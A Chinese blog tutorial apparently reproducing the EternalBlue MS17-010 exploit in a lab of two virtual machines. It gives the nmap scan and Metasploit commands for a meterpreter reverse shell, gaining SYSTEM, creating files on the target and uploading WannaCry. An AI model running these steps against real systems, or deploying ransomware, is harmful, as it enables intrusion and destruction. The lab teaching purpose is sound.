资讯

展开

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

作者:快盘下载 人气:

文章目录

1. 前期准备2. 保证受害者与攻击者主机能够通信3. 检查受害主机的TCP端口是否打开4. 在msfconsole中查询漏洞利用模块5. 利用永恒之蓝漏洞并设置相关参数6. 利用成功;获取WINDOWS系统管理员权限7. 创建文件控制目标8.上传wannacry

1. 前期准备

虚拟机;

kaliWindows 7

2. 保证受害者与攻击者主机能够通信

开启了两台虚拟机;保证在同一网段下

##Kali
ifconfig
##Windows 7
ipconfig

Kali攻击机IP为192.168.92.131
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Windows下IP地址为192.168.92.136

两台虚拟机在同一网段;故可保持通信

3. 检查受害主机的TCP端口是否打开

nmap -sS 192.168.92.136

使用的是nmap模块;输入命令进行扫描
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
发现445端口打开;SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播;因此可以加以利用

4. 在msfconsole中查询漏洞利用模块

这里有各种MS17-010漏洞版本;我们根据目标系统选择编号为3的版本

msfconsole
search ms17-010

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

5. 利用永恒之蓝漏洞并设置相关参数

use exploit/windows/smb/ms17_010_eternalblue
##利用永恒之蓝漏洞
set payload windows/x64/meterpreter/reverse_tcp
##设置payload

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

set LHOST 192.168.92.131
##设置本机IP地址
set RHOSTS 192.168.92.136
##设置受害主机IP
set RPORT 445
##设置端口445;注意该端口共享功能是高危漏洞端口;包括之前分享的139、3389等
exploit
##利用漏洞

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
看到WIN才说明利用成功;FAIL就是失败
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

6. 利用成功;获取WINDOWS系统管理员权限

getuid

返回系统管理员权限
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

7. 创建文件控制目标

cd ..
# 创建文件夹
mkdir hacker
# 访问目录
dir
cd hacker
# 创建文件并写入内容
echo helloworld>test.txt

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
就可以看到windows7电脑中新建了这么个文件
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

8.上传wannacry

我没这个病毒就不传了哈哈哈哈哈

shell
upload /root/wcry.exe c:

加载全部内容

相关教程
猜你喜欢
用户评论
快盘暂不提供评论功能!